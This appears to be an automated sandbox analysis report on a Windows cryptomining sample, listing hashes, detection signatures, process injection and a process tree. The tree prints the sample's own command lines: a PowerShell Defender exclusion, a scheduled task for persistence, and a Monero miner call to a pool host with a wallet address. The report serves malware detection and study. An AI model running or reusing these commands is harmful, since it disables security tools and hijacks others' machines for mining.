Analysis
-
max time kernel
64s -
max time network
113s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
13-11-2022 16:30
Static task
static1
Behavioral task
behavioral1
Sample
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe
Resource
win7-20220901-en
General
-
Target
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe
-
Size
1.1MB
-
MD5
19a474356662325b2059630216338194
-
SHA1
5537672751a37401bccf455f651d564bb314a924
-
SHA256
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
-
SHA512
d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
SSDEEP
24576:8tPBwXgZiujGrs4EroJ7WtRDbQMPLqxpw3qt:CigZMsMN4v9jqxpwa
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/1192-143-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1192-145-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1192-147-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1192-158-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1192-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1192-165-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
AVPTQBAEW.exepid process 876 AVPTQBAEW.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 580 cmd.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
AVPTQBAEW.exedescription pid process target process PID 876 set thread context of 1192 876 AVPTQBAEW.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 568 timeout.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exeAVPTQBAEW.exepid process 1736 powershell.exe 916 powershell.exe 876 AVPTQBAEW.exe 876 AVPTQBAEW.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 472 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exepowershell.exeAVPTQBAEW.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 1328 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 876 AVPTQBAEW.exe Token: SeDebugPrivilege 916 powershell.exe Token: SeLockMemoryPrivilege 1192 vbc.exe Token: SeLockMemoryPrivilege 1192 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 1192 vbc.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.execmd.exeAVPTQBAEW.execmd.exedescription pid process target process PID 1328 wrote to memory of 1736 1328 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe powershell.exe PID 1328 wrote to memory of 1736 1328 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe powershell.exe PID 1328 wrote to memory of 1736 1328 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe powershell.exe PID 1328 wrote to memory of 580 1328 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe cmd.exe PID 1328 wrote to memory of 580 1328 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe cmd.exe PID 1328 wrote to memory of 580 1328 8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe cmd.exe PID 580 wrote to memory of 568 580 cmd.exe timeout.exe PID 580 wrote to memory of 568 580 cmd.exe timeout.exe PID 580 wrote to memory of 568 580 cmd.exe timeout.exe PID 580 wrote to memory of 876 580 cmd.exe AVPTQBAEW.exe PID 580 wrote to memory of 876 580 cmd.exe AVPTQBAEW.exe PID 580 wrote to memory of 876 580 cmd.exe AVPTQBAEW.exe PID 876 wrote to memory of 916 876 AVPTQBAEW.exe powershell.exe PID 876 wrote to memory of 916 876 AVPTQBAEW.exe powershell.exe PID 876 wrote to memory of 916 876 AVPTQBAEW.exe powershell.exe PID 876 wrote to memory of 340 876 AVPTQBAEW.exe cmd.exe PID 876 wrote to memory of 340 876 AVPTQBAEW.exe cmd.exe PID 876 wrote to memory of 340 876 AVPTQBAEW.exe cmd.exe PID 340 wrote to memory of 1804 340 cmd.exe schtasks.exe PID 340 wrote to memory of 1804 340 cmd.exe schtasks.exe PID 340 wrote to memory of 1804 340 cmd.exe schtasks.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe PID 876 wrote to memory of 1192 876 AVPTQBAEW.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe"C:\Users\Admin\AppData\Local\Temp\8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3110.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:568 -
C:\ProgramData\WindowsMail\AVPTQBAEW.exe"C:\ProgramData\WindowsMail\AVPTQBAEW.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:340 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"5⤵
- Creates scheduled task(s)
PID:1804 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1192
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
149B
MD5cd3a66d35de4349948eb82b00e894be0
SHA1ffec75f5625b0be4e0beea79ad128c4bd8d6d8bc
SHA2562f4b7612214beb1f5def8c862b8adcc58111a29d03243d62944f91ee800e5240
SHA5128e9288fc55fa3bc45697955d4a6741c2da6c97078b2da4f8d91e7caec54744ac1c787592f9c0eddf07596aa5a3b52973100a2e136c4a341ca04e4722a20811fd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5dd6eb53b98807f933d74951754d46bd3
SHA1380eed38fe24d7cf829270b2b5452b201736e8d1
SHA25699636f970df42e8f37cea8a9989979083beaa2380b8f201457dc6303c65e75a7
SHA512322fa770406ef6f7f0a6a6cd204edb7b40590cc9a6787d4d967a42f537db218d48461df666f68de6c7a31b3027a79ed3d0db33f315e8d8eda75fe89a0c9c901d
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4